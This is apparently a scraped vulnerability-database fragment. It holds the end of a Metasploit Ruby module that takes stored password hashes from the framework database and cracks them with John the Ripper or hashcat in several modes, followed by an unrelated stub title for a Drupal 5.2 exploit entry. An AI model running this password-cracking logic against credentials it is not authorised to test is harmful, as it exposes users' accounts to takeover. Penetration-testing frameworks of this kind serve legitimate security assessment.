method_of_crack\n results = []\n\n cracker = new_password_cracker\n cracker.cracker = action.name\n\n cracker_version = cracker.cracker_version\n if action.name == 'john' and not cracker_version.include?'jumbo'\n fail_with(Failure::BadConfig, 'John the Ripper JUMBO patch version required. See https://github.com/magnumripper/JohnTheRipper')\n end\n print_good(\"#{action.name} Version Detected: #{cracker_version}\")\n\n # create the hash file first, so if there aren't any hashes we can quit early\n # hashes is a reference list used by hashcat only\n cracker.hash_path, hashes = hash_file(hashes_regex)\n\n # generate our wordlist and close the file handle.\n wordlist = wordlist_file\n unless wordlist\n print_error('This module cannot run without a database connected. Use db_connect to connect to a database.')\n return\n end\n\n wordlist.close\n print_status \"Wordlist file written out to #{wordlist.path}\"\n\n cleanup_files = [cracker.hash_path, wordlist.path]\n\n hashes_regex.each do |format|\n # dupe our original cracker so we can safely change options between each run\n cracker_instance = cracker.dup\n cracker_instance.format = format\n if action.name == 'john'\n cracker_instance.fork = datastore['FORK']\n end\n\n # first check if anything has already been cracked so we don't report it incorrectly\n print_status \"Checking #{format} hashes already cracked...\"\n results = check_results(cracker_instance.each_cracked_password, results, format, hashes, 'Already Cracked/POT')\n vprint_good(print_results(tbl, results))\n\n if action.name == 'john'\n print_status \"Cracking #{format} hashes in single mode...\"\n cracker_instance.mode_single(wordlist.path)\n show_command cracker_instance\n cracker_instance.crack do |line|\n vprint_status line.chomp\n end\n results = check_results(cracker_instance.each_cracked_password, results, format, hashes, 'Single')\n vprint_good(print_results(tbl, results))\n\n print_status \"Cracking #{format} hashes in normal mode\"\n cracker_instance.mode_normal\n show_command cracker_instance\n cracker_instance.crack do |line|\n vprint_status line.chomp\n end\n results = check_results(cracker_instance.each_cracked_password, results, format, hashes, 'Normal')\n vprint_good(print_results(tbl, results))\n end\n\n if datastore['INCREMENTAL']\n print_status \"Cracking #{format} hashes in incremental mode...\"\n cracker_instance.mode_incremental\n show_command cracker_instance\n cracker_instance.crack do |line|\n vprint_status line.chomp\n end\n results = check_results(cracker_instance.each_cracked_password, results, format, hashes, 'Incremental')\n vprint_good(print_results(tbl, results))\n end\n\n if datastore['WORDLIST']\n print_status \"Cracking #{format} hashes in wordlist mode...\"\n cracker_instance.mode_wordlist(wordlist.path)\n # Turn on KoreLogic rules if the user asked for it\n if action.name == 'john' && datastore['KORELOGIC']\n cracker_instance.rules = 'KoreLogicRules'\n print_status \"Applying KoreLogic ruleset...\"\n end\n show_command cracker_instance\n cracker_instance.crack do |line|\n vprint_status line.chomp\n end\n\n results = check_results(cracker_instance.each_cracked_password, results, format, hashes, 'Wordlist')\n vprint_good(print_results(tbl, results))\n end\n\n #give a final print of results\n print_good(print_results(tbl, results))\n end\n if datastore['DeleteTempFiles']\n cleanup_files.each do |f|\n File.delete(f)\n end\n end\n end\n\n def hash_file(hashes_regex)\n hashes = []\n wrote_hash = false\n hashlist = Rex::Quickfile.new(\"hashes_tmp\")\n # Convert names from JtR to DB\n hashes_regex = hashes_regex.join('|')\n regex = Regexp.new hashes_regex\n framework.db.creds(workspace: myworkspace, type: 'Metasploit::Credential::NonreplayableHash').each do |core|\n next unless core.private.jtr_format =~ regex\n # only add hashes which havne't been cracked\n next unless already_cracked_pass(core.private.data).nil?\n if action.name == 'john'\n hashlist.puts hash_to_jtr(core)\n elsif action.name == 'hashcat'\n # hashcat hash files dont include the ID to reference back to so we build an array to reference\n hashes << {'hash' => core.private.data, 'un' => core.public.username, 'id' => core.id}\n hashlist.puts hash_to_hashcat(core)\n end\n wrote_hash = true\n end\n hashlist.close\n unless wrote_hash # check if we wrote anything and bail early if we didn't\n hashlist.delete\n fail_with Failure::NotFound, 'No applicable hashes in database to crack'\n end\n print_status \"Hashes Written out to #{hashlist.path}\"\n return hashlist.path, hashes\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/analyze/crack_osx.rb"}]}

Drupal &lt;= 5.2 PHP Zend Hash Vulnerability Exploitation Vector

Description

Exploit for unknown platform in category web applications

Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector